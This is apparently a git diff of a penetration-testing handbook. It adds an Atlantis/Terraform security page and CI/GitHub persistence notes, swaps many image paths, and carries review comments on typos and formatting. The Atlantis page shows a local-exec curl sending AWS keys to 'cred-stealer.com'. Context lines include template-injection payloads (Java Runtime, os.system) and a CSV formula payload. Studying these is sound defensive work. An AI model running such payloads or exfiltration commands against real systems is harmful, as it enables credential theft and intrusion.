Examples of (likely) CoinJoin transactions IDs on bitcoin's blockchain are `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
|
||||
|
||||
|
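Review bot: the before and after versions of the CoinJoin sentence ("This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated ... **can still be correlated** by the external observer.") are identical as rendered, so this hunk is either a whitespace-only change or a no-op; if it is whitespace, say so in the commit message, and consider collapsing the doubled bold `**some** **transactions**` into `**some transactions**` while here.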
@ -278,4 +278,3 @@ Note that there isn't any field for the origin address, this is because this can
|
|||
* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
|
||||
* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
|
||||
* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
|
||||
|
2
blockchain/blockchain-and-crypto-currencies/page-1.md
Normal file
|
@ -0,0 +1,2 @@
|
|||
# Page 1
|
||||
|
228
cloud-security/atlantis.md
Normal file
|
@ -0,0 +1,228 @@
|
|||
# Atlantis
|
||||
|
||||
## Basic Information
|
||||
|
||||
Atlantis basically helps you to to run terraform from Pull Requests from your git server.
|
||||
|
||||
![](<../.gitbook/assets/image (307).png>)
|
||||
|
||||
## Atlantis Access
|
||||
|
||||
### Git Server Credentials
|
||||
|
||||
**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
|
||||
However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
|
||||
[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
|
||||
|
||||
{% hint style="warning" %}
|
||||
In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
|
||||
{% endhint %}
|
||||
|
||||
### Webhooks
|
||||
|
||||
Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
|
||||
|
||||
One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
|
||||
|
||||
Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
|
||||
|
||||
{% hint style="warning" %}
|
||||
Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
|
||||
{% endhint %}
|
||||
|
||||
### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
|
||||
|
||||
Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
|
||||
|
||||
It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
|
||||
|
||||
* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
|
||||
* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
|
||||
* [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
|
||||
* [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider\_reference)
|
||||
* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
|
||||
* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
|
||||
* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
|
||||
|
||||
{% hint style="warning" %}
|
||||
The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
|
||||
{% endhint %}
|
||||
|
||||
## Server Configuration
|
||||
|
||||
Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
|
||||
|
||||
* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
|
||||
* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)****
|
||||
|
||||
Values are **chosen in this order**:
|
||||
|
||||
1. Flags
|
||||
2. Environment Variables
|
||||
3. Config File
|
||||
|
||||
{% hint style="warning" %}
|
||||
Note that in the configuration you might find interesting values such as **tokens and passwords**.
|
||||
{% endhint %}
|
||||
|
||||
### Repos Configuration
|
||||
|
||||
Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
|
||||
|
||||
1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
|
||||
1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
|
||||
2. ****[**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
|
||||
3. **Default** values
|
||||
|
||||
#### PR Protections
|
||||
|
||||
Atlantis allows to indicate if you want the **PR** to be **approved** by somebody else (even if that isn't set in the branch protection) and/or be **mergeable** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
|
||||
|
||||
In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
|
||||
|
||||
#### Scripts
|
||||
|
||||
The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) **** (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) **** (_post workflow hooks_) a **workflow is executed.**
|
||||
|
||||
There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml` ** file.
|
||||
|
||||
#### Workflow
|
||||
|
||||
In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
|
||||
****Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
|
||||
|
||||
{% hint style="danger" %}
|
||||
If the flag **** `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
|
||||
This will basically give **RCE in the Atlantis server to any user that can access that repo**.
|
||||
|
||||
```yaml
|
||||
# atlantis.yaml
|
||||
version: 3
|
||||
projects:
|
||||
- dir: .
|
||||
workflow: custom1
|
||||
workflows:
|
||||
custom1:
|
||||
plan:
steps:
- init
- run: my custom plan command
apply:
steps:
- run: my custom apply command
```
{% endhint %}

#### Conftest Policy Checking

Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev) **policies** against the plan output. Common usecases for using this step include:

* Denying usage of a list of modules
* Asserting attributes of a resource at creation time
* Catching unintentional resource deletions
* Preventing security risks (ie. exposing secure ports to the public)

You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).

## Atlantis Commands

****[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:

```bash
# Get help
atlantis help

# Run terraform plan
atlantis plan [options] -- [terraform plan flags]
##Options:
## -d directory
## -p project
## --verbose
## You can also add extra terraform options

# Run terraform apply
atlantis apply [options] -- [terraform apply flags]
##Options:
## -d directory
## -p project
## -w workspace
## --auto-merge-disabled
## --verbose
## You can also add extra terraform options
```

## Attacks

Atlantis could be exploited by

* An attacker submitting a **pull request** that contains a **malicious Terraform file** that uses a **malicious provider or an** [**`external` data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) that **Atlantis** then **runs `terraform plan`** on (which it does automatically unless you've turned off automatic plans).
* Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)****

```
resource "null_resource" "null" {
provisioner "local-exec" {
command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}
```
* Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** `master`.
* Someone adding **`atlantis plan/apply` comments on your valid pull requests** causing terraform to run when you don't want it to.
* **Bitbucket**: Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).

## Mitigations

### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>

Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.

### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>

If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.

### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>

Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:

* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
* Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.

This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.

### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>

If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.

To prevent this, you could:

1. Bake providers into the Atlantis image or host and deny egress in production.
2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.

### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>

Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).

If you are using Azure DevOps, instead of webhook secrets add a basic username and password.

#### [#](https://www.runatlantis.io/docs/security.html#azure-devops-basic-authentication)Azure DevOps Basic Authentication <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>

Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.

### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>

If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.

### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>

It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.

You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.

## References

* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)****
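Review bot: the custom-workflow YAML at the top of this hunk is flat, with `steps:`, `- init` and `- run:` rendered at the same level as `plan:` and `apply:`, which is not valid YAML; indent `steps:` under `plan:`/`apply:` and the list items under `steps:`. In the bash block `##Options:` needs a space after the hashes like the other comment lines, and the `null_resource`/`local-exec` block has no language tag. Two wording nits: 'a allowlist' should be 'an allowlist' and 'It is very recommended' should be 'It is strongly recommended'. Since the paragraph after the BasicAuth flags already shows `ATLANTIS_WEB_PASSWORD`, say there that the environment variable is the preferred form, because a value passed as `--web-password=...` is readable by other local users from the process list.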
@ -17,7 +17,7 @@ According to [**the docs**](https://circleci.com/docs/2.0/env-vars/#) there are

### Built-in env variables

Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.

### Clear text

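Review bot: the removed and added 'Every container run by CircleCI...' lines are identical as rendered, so this hunk changes only whitespace or an invisible character; either drop it or state in the commit message what was actually changed.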
@ -255,4 +255,5 @@ jobs:
* _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
* It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday.
* Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday.
* It you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
* If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
* You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value

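Review bot: the added last bullet reads 'inject commands via a secret modifying its value'; 'by modifying its value' makes clear that it is the secret's value that is changed, not the task. The corrected 'If you are a github owner' bullet still says 'as backdoor'; make it 'as a backdoor' while you are there.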
@ -2,7 +2,7 @@

## Architecture

![](<../../.gitbook/assets/image (651) (1).png>)
![](<../../.gitbook/assets/image (307) (3).png>)

### ATC: web UI & build scheduler

@ -17,7 +17,7 @@ Note that other cloud resources could be searched for and that some times these

As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).

![](<../../.gitbook/assets/image (628) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (618).png>)

The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names:

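Review bot: the context sentence 'These buckets might be (to list the content, read, write...)' is missing its predicate, and 'miss-configured buckets with that names' should read 'misconfigured buckets with those names'. Neither is introduced by this image swap, but both sit in the changed region and are cheap to fix in the same commit.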
@ -44,7 +44,7 @@ Tools (each tool contains its list of regexes):
* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks)
* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)

## Internal Recon
## Internal Recon & Attacks

For this scenario we are going to suppose that you have obtained some access to a github account.

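Review bot: renaming the heading from 'Internal Recon' to 'Internal Recon & Attacks' also changes the anchor generated for it, so any link elsewhere in the book that points at the old `#internal-recon` anchor will break; grep for it and update those links in the same change.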
@ -248,7 +248,7 @@ jobs:
* **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections.
* **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.
* **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.
* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
* If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.

### Bypass Environments Protections

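Review bot: the removed and added 'Bypassing push protections' bullets are identical as rendered, so this hunk changes only whitespace. While touching the line, note that it is a sentence fragment ('If a repo only allows certain users to send push ... in branches.') with no main clause; the bullet below it reads as the continuation, so either merge them or finish the sentence.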
@ -266,3 +266,15 @@ Note, that you might find the edge case where **all the branches are protected**
```

Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.

## Persistence

* Generate **user token**
* Steal **github tokens** from **secrets**
* **Deletion** of workflow **results** and **branches** 
* Give **more permissions to all the org**
* Create **webhooks** to exfiltrate information
* Invite **outside collaborators**
* **Remove** **webhooks** used by the **SIEM**
* Create/modify **Github Action** with a **backdoor**
* Find v**ulnerable Github Action to command injection** via **secret** value modification 

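Review bot: in the new Persistence list, 'Find v**ulnerable Github Action to command injection**' has the opening bold marker one character late (it should be '**vulnerable ...**'), and the 'Deletion of workflow results and branches' and 'Find vulnerable ...' bullets end with a trailing space. Consider making the entries parallel ('Delete' rather than 'Deletion'), since that one is the only noun phrase in a list of imperatives.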
@ -8,7 +8,7 @@ This machine was categorised as easy and it was pretty easy.

I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):

![](<../../.gitbook/assets/image (79) (2).png>)
![](<../../.gitbook/assets/image (79) (1).png>)

In as you can see 2 ports are open: 80 (**HTTP**) and 22 (**SSH**)

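Review bot: the context line 'In as you can see 2 ports are open' has a stray 'In'; it should read 'As you can see 2 ports are open'. Not part of the image swap, but it is right next to it.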
@ -387,7 +387,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**

Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`

![](<../../.gitbook/assets/image (620).png>)
![](<../../.gitbook/assets/image (621) (1) (1) (1) (1) (1) (1).png>)

Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:

@ -456,7 +456,7 @@ For example, in the following situation there is a **local variable in the stack

So, flag is in **0xffffcf4c**

![](<../../.gitbook/assets/image (618) (2).png>)
![](<../../.gitbook/assets/image (622).png>)

And from the leak you can see the **pointer to the flag** is in the **8th** parameter:

@ -47,7 +47,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig

In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)

![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (2) (1) (1) (1) (2).png>)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2).png>)

An then use the following code

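Review bot: the context lines around this image swap carry two typos worth fixing in the same commit: 'the the `p` command' (doubled 'the') and 'An then use the following code' (should be 'And then').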
@ -134,7 +134,7 @@ Some interesting attributes:
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (among others):
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.

![](<../../../.gitbook/assets/image (507) (1) (1).png>)
![](<../../../.gitbook/assets/image (507) (1).png>)

![](<../../../.gitbook/assets/image (509).png>)

@ -60,7 +60,7 @@ This tool is also useful to get **other information analysed** from the packets
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.

![](<../../../.gitbook/assets/image (567) (1).png>)
![](<../../../.gitbook/assets/image (567) (1) (1).png>)

### [BruteShark](https://github.com/odedshimon/BruteShark)

@ -83,7 +83,7 @@ You can add a column that show the Host HTTP header:

And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**):

![](<../../../.gitbook/assets/image (408).png>)
![](<../../../.gitbook/assets/image (408) (1).png>)

## Identifying local hostnames

@ -36,7 +36,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```

![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
![](<../../../.gitbook/assets/image (495) (1) (1).png>)

### Volume Shadow Copies

@ -134,7 +134,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi

Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).

![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1).png>)
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1).png>)

### USB Detective

@ -133,7 +133,7 @@ Within this registry it's possible to find:

![](<../../../.gitbook/assets/image (477).png>)

![](<../../../.gitbook/assets/image (479) (1).png>)
![](<../../../.gitbook/assets/image (479) (1) (1).png>)

Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB` and comparing the values of the sub-keys it's possible to find the VID value

@ -153,7 +153,7 @@ Having the **{GUID}** of the device it's now possible to **check all the NTUDER.

Checking the registry `System\MoutedDevices` it's possible to find out **which device was the last one mounted**. In the following image check how the last device mounted in `E:` is the Thoshiba one (using the tool Registry Explorer).

![](<../../../.gitbook/assets/image (483) (1) (1).png>)
![](<../../../.gitbook/assets/image (483) (1).png>)

### Volume Serial Number

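Review bot: the context line names the registry key as `System\MoutedDevices`; the key is `SYSTEM\MountedDevices`, and a reader copying the path as written will not find it. 'Thoshiba' should be 'Toshiba'. Both sit in the changed region, so fix them with the image swap.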
@ -937,7 +937,7 @@ int main(int argc, char * argv[]) {
I exploit needs to find a pointer to something mounted on the host. The original exploit used the file `/.dockerinit` and this modified version uses `/etc/hostname`. **If the exploit isn't working** maybe you need to set a different file. To find a file that is mounted in the host just execute `mount` command:
{% endhint %}

![](<../../.gitbook/assets/image (407) (1).png>)
![](<../../.gitbook/assets/image (407) (2).png>)

**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)

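Review bot: the hint text starts 'I exploit needs to find a pointer'; it should read 'The exploit needs to find a pointer'. Not introduced by this hunk, but it is the first line of the changed region.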
@ -193,7 +193,7 @@ The offsets of any constructors are held in the **\_\_mod\_init\_func** section

The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type.

![](<../../.gitbook/assets/image (507) (3).png>)
![](<../../.gitbook/assets/image (555).png>)

#### Get the info

@ -108,7 +108,7 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi
2. The JSON payload is encrypted using Absinthe (**`NACSign`**)
3. All requests over HTTPs, built-in root certificates are used

![](<../../../.gitbook/assets/image (566).png>)
![](<../../../.gitbook/assets/image (566) (1).png>)

The response is a JSON dictionary with some important data like:

@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate (from APNS)**
* **Certificate chain** includes expired **Apple iPhone Device CA**

![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1).png>)
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>)

### Step 6: Profile Installation

@ -223,7 +223,7 @@ In this case you could try to abuse the functionality creating a web with the fo

In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.

![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (436) (1) (1).png>)

Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).

@ -36,7 +36,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s

**Only for Windows.**

![](<../../.gitbook/assets/image (207) (1) (1).png>)
![](<../../.gitbook/assets/image (207) (1).png>)

### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)

@ -210,7 +210,7 @@ However there are **a lot of different command line useful options** that you ca

First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_

![](<../../.gitbook/assets/image (367).png>)
![](<../../.gitbook/assets/image (367) (1).png>)

**Export the certificate in Der format** and lets **transform** it to a form that **Android** is going to be able to **understand.** Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run** this machine **with** the **`-writable-system`** option.\
For example you can run it like:
@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/

You should also check the **ContentProvider code** to search for queries:

![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>)
![](<../../../.gitbook/assets/image (121) (1) (1).png>)

Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:

@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n

![](<../../../.gitbook/assets/image (187).png>)

![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1) (1).png>)

Because you will be able to call them

@ -25,7 +25,7 @@ Several **counter-measures** could be in place to avoid this vulnerability.

### CSRF map

![](<../.gitbook/assets/image (112).png>)
![](<../.gitbook/assets/image (307) (1).png>)

## Defences Bypass

@ -14,7 +14,7 @@ The following properties or combination of properties apply to ViewState informa

## **Test Cases**

![](<../../.gitbook/assets/image (309) (1).png>)
![](<../../.gitbook/assets/image (309).png>)

### Test Case: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false

@ -149,7 +149,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro

Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) with Java classes for being tested.

![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)
![](<../../.gitbook/assets/intruder4 (1) (1).gif>)

### More Information

@ -4,7 +4,7 @@

First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example:

![](<../../../.gitbook/assets/image (389) (1).png>)
![](<../../../.gitbook/assets/image (356).png>)

In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties.

@ -41,7 +41,7 @@ The good news is that **this payload is executed automatically when the file is

It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**

![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1).png>)
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>)

### More

@ -500,7 +500,7 @@ def handleResponse(req, interesting):

## More info

![](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg)
![](../../.gitbook/assets/eki5edauuaaipik.jpg)

[Image from here.](https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104)

@ -52,7 +52,7 @@ Note that if you put just the new line characters sending a header without conte

In this case the injection was performed inside the request line:

![](<../../.gitbook/assets/image (640) (1).png>)
![](<../../.gitbook/assets/image (645) (1) (1).png>)

### URL Prefix Injection

@ -102,7 +102,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **

This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**

![](<../.gitbook/assets/image (643) (1) (1).png>)
![](<../.gitbook/assets/image (630) (1) (1).png>)

### Response Splitting

@ -69,7 +69,7 @@ In order to **find event listeners** in the current page you can:
* **Search** the JS code for `window.addEventListener` and `$(window).on` (_JQuery version_)
* **Execute** in the developer tools console: `getEventListeners(window)`

![](<../.gitbook/assets/image (618) (1) (1).png>)
![](<../.gitbook/assets/image (618) (1).png>)

* **Go to** _Elements --> Event Listeners_ in the developer tools of the browser

@ -8,7 +8,7 @@

## Attacks Graphic

![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (3).png>)
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (3).png>)

## Tool

@ -260,6 +260,7 @@ New version of Pebble :
{% set cmd = 'id' %}
{% endraw %}


{% set bytes = (1).TYPE
.forName('java.lang.Runtime')
.methods[6]
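Review bot: `{% endraw %}` sits above the `{% set bytes = (1).TYPE ... %}` tag, so that tag and the lines that follow it are outside the raw block and will be processed (or rejected) by the site's template engine instead of being shown literally; move `{% endraw %}` to after the end of the payload rather than only adding a blank line here.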
@ -327,6 +328,7 @@ Search for "com.hubspot.content.hubl.context.TemplateContextRequest" and discove
//output: com.hubspot.jinjava.JinjavaConfig@78a56797

//It was also possible to call methods on the created object by combining the

{% raw %}
{% %} and {{ }} blocks
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
@ -606,6 +608,7 @@ Check out the following page to learn tricks about **arbitrary command execution
{% import foobar %} = Error
{% import os %}
{% endraw %}

{{os.system('whoami')}}
```

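Review bot: `{{os.system('whoami')}}` comes after `{% endraw %}` and is therefore outside the raw block, so the `{{ }}` expression is exposed to the site's template engine; move `{% endraw %}` below it so the line is rendered literally like the `{% import %}` lines above it.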
